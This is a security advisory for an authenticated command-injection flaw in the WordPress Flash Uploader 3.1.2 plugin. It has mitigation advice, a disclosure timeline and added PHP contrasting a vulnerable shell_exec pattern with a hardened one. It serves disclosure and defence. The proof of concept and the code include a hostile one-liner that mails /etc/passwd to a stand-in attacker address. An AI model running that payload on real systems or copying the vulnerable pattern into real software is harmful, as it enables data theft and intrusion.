Wordpress Flash Uploader 3.1.2, Arbitrary Command Execution
Arbitrary command execution. Requires authentication. A user with access to the settings panel of the WordPress Flash Uploader plugin can execute arbitrary shell commands via specially crafted form input. While it is true that an attacker who has gained administrative privileges on a WordPress blog could simply install their own plugin, that is only the case where plugins can be installed without FTP credentials; here, settings-panel access alone is sufficient. Successful exploitation could lead to disclosure of sensitive information in the context of the web server user, or deployment of arbitrary code (e.g. a web shell).
Homepage
https://wordpress.org/plugins/wordpress-flash-uploader/
CVSS Score
4.9
CVSS Vector
(AV:N/AC:M/Au:S/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
Administrative
Mitigation
Filter user input against an allow-list of characters valid in a path (alphanumerics, '/', '.', '_' and '-'); a blocklist of individual shell metacharacters is insufficient. Ensure the supplied path actually exists and is executable before the 'check_image_magic' method runs (and subsequently tests the provided path via shell_exec / exec).
Proof of Concept
- Install the WordPress Flash Uploader plugin.
- Browse to http://localhost/wp-admin/options-general.php?page=wordpress-flash-uploader.php
- Input your command into the 'Image magick command' field and save the settings.
- Note: the '>' symbol is filtered, but the '|' symbol is not, e.g. cat /etc/passwd | mail naughty.person@attacker.org
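The following PHP is an added illustration of the bug class behind the mitigation and proof of concept above; it is not the plugin's own code, and the plugin's actual implementation of 'check_image_magic' has not been reproduced here. The function names, the exact filter (a blocklist that strips only '>') and the '-version' probe are assumptions made for the example. The hardened variant adds escapeshellarg(), which the advisory's mitigation does not mention, on top of the allow-list and existence checks it does recommend.

```php
<?php
// Added example (not from the WordPress Flash Uploader plugin). Shows how an
// admin-supplied "Image magick command" path becomes command injection when it is
// concatenated into a shell command, and one way to fix it.

// Vulnerable pattern (hypothetical reconstruction): blocklist only '>' and then
// hand the raw string to the shell. '|', ';', '&', '`' and '$()' all still work.
function check_image_magic_vulnerable(string $path): string
{
    $path = str_replace('>', '', $path);
    return (string) shell_exec($path . ' -version 2>&1');
}

// Validation used by the hardened variant: allow-list of path characters, then
// resolve the path and require an existing, executable regular file.
// Returns the resolved path, or null if the value must be rejected.
function validate_image_magic_path(string $path): ?string
{
    // Absolute path made only of alphanumerics, '/', '.', '_' and '-'.
    if (!preg_match('#^/[A-Za-z0-9/_.-]+$#', $path)) {
        return null;
    }
    // realpath() collapses '..' and symlinks; refuse anything that is not a
    // real executable file so the setting cannot point at /etc/passwd etc.
    $real = realpath($path);
    if ($real === false || !is_file($real) || !is_executable($real)) {
        return null;
    }
    return $real;
}

// Hardened pattern: validate first, then quote the argument for the shell.
function check_image_magic_safe(string $path): ?string
{
    $real = validate_image_magic_path($path);
    if ($real === null) {
        return null;
    }
    $out = shell_exec(escapeshellarg($real) . ' -version 2>&1');
    return $out === null ? null : $out;
}

// Constructed inputs: a legitimate path and the advisory's injection payload.
$inputs = [
    '/usr/bin/convert',
    'cat /etc/passwd | mail naughty.person@attacker.org',
];

foreach ($inputs as $in) {
    $verdict = validate_image_magic_path($in) === null ? 'REJECTED' : 'accepted';
    echo str_pad($verdict, 9), ' ', $in, PHP_EOL;
}
// Do NOT call check_image_magic_vulnerable() with the payload on a real host:
// it would execute 'cat /etc/passwd | mail ...' as the web server user.
```

Running this prints that '/usr/bin/convert' is accepted only where that binary actually exists and is executable, while the piped payload is rejected by the allow-list before any shell is involved. The key design point is ordering: validate and resolve the path before it ever reaches shell_exec, and quote it with escapeshellarg() even then, so a future change to the allow-list cannot quietly reopen the hole.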
Timeline
- 2014-07-18: Discovered
- 2014-07-18: Reported to vendor
- 2014-07-21: Reported to alternative vendor address
- 2014-07-21: Received response – vendor believes not an issue, due to authentication requirement
- 2014-07-21: Re-iterated concern regarding arbitrary command execution
- 2014-07-21: Fix published by vendor
- 2014-08-05: Advisory released